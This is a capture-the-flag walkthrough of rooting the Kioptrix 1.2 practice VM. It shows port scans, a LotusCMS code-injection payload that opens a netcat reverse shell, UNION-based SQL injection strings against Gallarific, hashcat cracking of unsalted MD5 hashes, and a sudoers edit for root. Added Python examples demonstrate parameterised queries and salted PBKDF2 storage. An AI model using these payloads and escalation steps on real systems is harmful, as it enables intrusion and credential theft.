Kioptrix 1.2 (#3)


According to the description supplied by the author himself:


After booting up the machine I had to find out which IP address it had been given by DHCP. To do that I ran a ping sweep over the entire subnet using nmap.

# nmap -sP -n
-- snip --
Nmap scan report for
Host is up (0.00029s latency).
MAC Address: 00:0C:29:05:D6:2E (VMware)
-- snip --
# echo >> /etc/hosts
# nmap -sT -sV -O
-- snip --
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
-- snip --

Low privilege shell

Low privileges can be acquired in more than one way. So far, I found two ways:

Lotus CMS Remote Code Execution

The starting page looks like some kind of CMS or blog engine. Indeed, the login page confirms it is LotusCMS.

LotusCMS login page
index');${system('nc -e /bin/sh 443')};#
Reverse shell
$GLOBALS["gallarific_path"] = "";$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
# python -c 'import pty; pty.spawn("/bin/sh")'
# mysql -uroot -p
Enter password: fuckeyou
-- snip --
mysql> show databases;
| Database |
| information_schema |
| gallery |
| mysql |
3 rows in set (0.00 sec)
mysql> use gallery;
-- snip --
Database changed
mysql> show tables;
| Tables_in_gallery |
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
7 rows in set (0.01 sec)
mysql> SELECT * FROM dev_accounts;
| id | username | password |
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
2 rows in set (0.00 sec)

Gallarific SQL Injection

There is also a way of obtaining this information without an actual shell. In the Gallarific application I found a SQL injection vulnerability by adding an apostrophe character to the ID parameter:
SQL error after inserting apostrophe to parameter
,2,3,4,5,6%20--&sort=photoid#photos
UNION’d values visible on the site
,2,GROUP_CONCAT(table_name),4,5,6%20FROM%20information_schema.tables%20WHERE%20table_schema=database()--&sort=photoid#photos
List of tables from the server
,2,group_concat(column_name),4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=%27dev_accounts%27%20--&sort=photoid#photos
Dev_accounts column
,username,password,4,5,6%20FROM%20dev_accounts%20--&sort=photoid#photos
Credentials listed
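The UNION queries above work because the id value is spliced straight into the SQL text of the photo lookup. The following Python example is an addition to this write-up, not code from the author or from Gallarific: it rebuilds the situation against an in-memory SQLite stand-in for the MySQL gallery database (table and column names taken from the page, row contents and the six photo columns constructed) and runs a payload in the shape of the page's last UNION query against the vulnerable string-built query and against a type-checked, parameterised one.

```python
import sqlite3
from urllib.parse import unquote

# Constructed in-memory stand-in for the gallery database from the write-up.
# Table/column names follow the page (dev_accounts: id, username, password);
# the row contents are placeholders, not the real hashes.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE gallarific_photos (
            photoid INTEGER, title TEXT, filename TEXT,
            uploaded TEXT, views INTEGER, comments INTEGER);
        INSERT INTO gallarific_photos VALUES (1, 'sunset', 'sunset.jpg', '2009-07-07', 10, 0);
        CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', 'HASH_PLACEHOLDER_1');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', 'HASH_PLACEHOLDER_2');
    """)
    return con

# Six columns, so a UNION needs six values, which is why the page's payloads use 1..6.
PHOTO_COLS = "photoid, title, filename, uploaded, views, comments"

def vulnerable_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """The bug: the URL-decoded id parameter is pasted into the SQL text."""
    sql = f"SELECT {PHOTO_COLS} FROM gallarific_photos WHERE photoid = {unquote(raw_id)}"
    return con.execute(sql).fetchall()

def safe_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: validate the type first, then bind the value as a parameter."""
    try:
        photo_id = int(unquote(raw_id))
    except ValueError:
        return []  # anything that is not an integer id is rejected outright
    sql = f"SELECT {PHOTO_COLS} FROM gallarific_photos WHERE photoid = ?"
    return con.execute(sql, (photo_id,)).fetchall()

# Constructed payload in the shape of the write-up's final query:
# dev_accounts columns in slots 2 and 3, constants in the rest.
UNION_PAYLOAD = "null%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20dev_accounts%20--"

if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", vulnerable_lookup(con, UNION_PAYLOAD))
    print("hardened:  ", safe_lookup(con, UNION_PAYLOAD))
```

The hardened lookup rejects the payload before it reaches the database, and even a value that passes `int()` is bound as data rather than parsed as SQL. Validation alone is not the fix; binding is, and the type check simply gives an earlier, cleaner failure.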

Privilege escalation

Credentials reversal

No matter how we obtained the credentials in the previous step, we need to reverse the password hashes. I pasted those hashes into a hashes.txt file on the attacker's machine and used hashcat to crack them:

# hashcat64.exe -m0 -a 0 hashes.txt rockyou.txt
-- snip --
-- snip --
# ssh
-- snip --'s password: starwars
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
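The dev_accounts hashes are 32 hex characters and hashcat mode 0 (`-m0`) treats them as unsalted MD5, which is why a single rockyou run recovers them. The Python example below is an addition to this write-up, not the author's code: it shows the wordlist lookup that makes unsalted MD5 cheap to reverse, run over a small constructed wordlist against the two hashes from the page, next to salted PBKDF2 storage where every user's hash has to be attacked separately and slowly. The helper names, the record format and the round count are my choices.

```python
import hashlib
import hmac
import os

def md5_hex(word: str) -> str:
    """Plain MD5 of a string, the scheme the gallery's dev_accounts table uses."""
    return hashlib.md5(word.encode()).hexdigest()

def md5_wordlist_lookup(target_hashes, wordlist) -> dict:
    """One pass over the wordlist recovers every target that is the MD5 of a word.
    No salt means the same work serves every user at once."""
    targets = set(target_hashes)
    found = {}
    for word in wordlist:
        digest = md5_hex(word)
        if digest in targets:
            found[digest] = word
    return found

# Hardened storage: per-user random salt plus a deliberately slow KDF.
PBKDF2_ROUNDS = 600_000  # chosen for this example; size it to your login latency budget

def store_password(password: str, salt: bytes = b"") -> str:
    """Return a self-describing record: algo$rounds$salt_hex$dk_hex."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)

# The two hashes from the write-up's dev_accounts table and a constructed four-word list.
PAGE_HASHES = {"0d3eccfb887aabd50f243b3f155c0f85", "5badcaf789d3d1d09794d8f021f40f0e"}
WORDLIST = ["password", "123456", "starwars", "letmein"]

if __name__ == "__main__":
    print("recovered from unsalted MD5:", md5_wordlist_lookup(PAGE_HASHES, WORDLIST))
    record = store_password("starwars")
    print("stored record:", record)
    print("verify correct password:", verify_password("starwars", record))
    print("verify wrong password:  ", verify_password("Starwars", record))
```

With the salted record, a leaked table no longer yields a shared lookup: each row carries its own salt, so the wordlist has to be rehashed per user at 600,000 rounds apiece, and `hmac.compare_digest` keeps the verification from leaking timing information about how many bytes matched.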

Escalating privileges

On the victim machine I checked the /home directory. There is an interesting txt file in loneferret’s folder:

# cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
Opening /etc/sudoers in ht, which sudo runs as root
loneferret ALL=(ALL) ALL
Modified /etc/sudoers with the line above
loneferret@Kioptrix3:~$ sudo bash
[sudo] password for loneferret: starwars
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18


That’s it! We’ve rooted Kioptrix 1.2 ;) Even though the challenge required more steps than the previous ones in the series, it was still quite easy. For me the biggest challenge was learning how to use the ht application. The hack itself was quite straightforward. Bear in mind though that difficulty is very subjective with these :)


